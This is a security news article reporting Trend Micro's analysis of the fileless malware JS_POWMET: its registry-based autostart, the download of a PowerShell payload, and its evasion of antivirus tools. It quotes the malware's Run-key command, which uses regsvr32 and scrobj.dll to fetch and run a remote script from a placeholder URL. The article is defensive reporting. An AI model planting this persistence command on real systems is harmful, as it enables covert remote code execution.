Thursday, December 5, 2024
HomeMalwareA Complete Fileless Malware "JS_POWMET" with Highly Sophisticated Evasion Technique

A Complete Fileless Malware “JS_POWMET” with Highly Sophisticated Evasion Technique

Published on

SIEM as a Service

Hackers are Distributing Advanced Fileless Malware with Evasion capabilities that lead very Difficult to Detect With a different kind of Advance Attacking Capabilities and Methods.

A Complete Fileless Malware was Detected as “JS_POWMET” that capable to evade the Security Control such as AV While Enter into the Target Machine with Fileless capability.

It will eventually reveal themselves when they execute their payload in the specific Target computer.

- Advertisement - SIEM as a Service

This Malware Spreading through an autostart registry procedure that hides the entry point of this Fileless malware.

This Highly complex and Obfuscated Fileless malware gives more pain to analyze through sandbox and also very difficult to examine by Malware Researchers.

According to Trend Micro Report JS_POWMET affecting APAC the most, with almost 90% of the infections coming from the region.

Also Read A Fileless Malware Called “ATMitch” Attack The ATM machines Remotely and Delete The Attack Evidence

Infection Chain

Initially, This Fileless Malware “JS_POWMET” arrives using Autostart registry entry point to the victim’s Machine.

This Malware usually Downloaded by a user from malicious Website and other fact is that File can be Dropped by other Malware.

Once “JS_POWMET” file Dropped into the victim’s machine then it will download TROJ_PSINJECT file and Execute it.

This Executed file contains Powershell script that runs under the process of Powershell.

In this point, Trend Micro researchers said, the registry has already been changed by the time it is downloaded into the system.

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
COM+ = “regsvr32 /s /n /u /i:{Malicious URL, downloads JS_POWMET} scrobj.dll”

A parameter called regsvr32 get the Malicious URL that has capable of fetching a file that contains XML with malicious JavaScript.

This regsvr32 will become capable of executing arbitrary scripts without saving the XML file on the machine/system.

Finally, it will automatically Download the Malicious file from Command & Control server whenever infected machine starts up.

One of the more effective methods for mitigating the effects of Fileless malware would be to limit access to critical infrastructure via container-based systems that separate endpoints from the most important parts of the network. Trend Micro said.

Balaji
Balaji
BALAJI is an Ex-Security Researcher (Threat Research Labs) at Comodo Cybersecurity. Editor-in-Chief & Co-Founder - Cyber Security News & GBHackers On Security.

Latest articles

HCL DevOps Deploy / Launch Vulnerability Let Embed arbitrary HTML tags

Recently identified by security researchers, a new vulnerability in HCL DevOps Deploy and HCL...

CISA Warns of Zyxel Firewalls, CyberPanel, North Grid, & ProjectSend Flaws Exploited in Wild

The Cybersecurity and Infrastructure Security Agency (CISA) has issued warnings about several vulnerabilities being...

HackSynth : Autonomous Pentesting Framework For Simulating Cyberattacks

HackSynth is an autonomous penetration testing agent that leverages Large Language Models (LLMs) to...

Fuji Electric Indonesia Hit by Ransomware Attack

Fuji Electric Indonesia has fallen victim to a ransomware attack, impacting its operations and...

API Security Webinar

72 Hours to Audit-Ready API Security

APIs present a unique challenge in this landscape, as risk assessment and mitigation are often hindered by incomplete API inventories and insufficient documentation.

Join Vivek Gopalan, VP of Products at Indusface, in this insightful webinar as he unveils a practical framework for discovering, assessing, and addressing open API vulnerabilities within just 72 hours.

Discussion points

API Discovery: Techniques to identify and map your public APIs comprehensively.
Vulnerability Scanning: Best practices for API vulnerability analysis and penetration testing.
Clean Reporting: Steps to generate a clean, audit-ready vulnerability report within 72 hours.

More like this

Weaponized Word Documents Attacking Windows Users to Deliver NetSupport & BurnsRAT

The threat actors distributed malicious JS scripts disguised as legitimate business documents, primarily in...

ElizaRAT Exploits Google, Telegram, & Slack Services For C2 Communications

APT36, a Pakistani cyber-espionage group, has recently upgraded its arsenal with ElizaRAT, a sophisticated...

New CleverSoar Malware Attacking Windows Users Bypassing Security Mechanisms

CleverSoar, a new malware installer, targets Chinese and Vietnamese users to deploy advanced tools...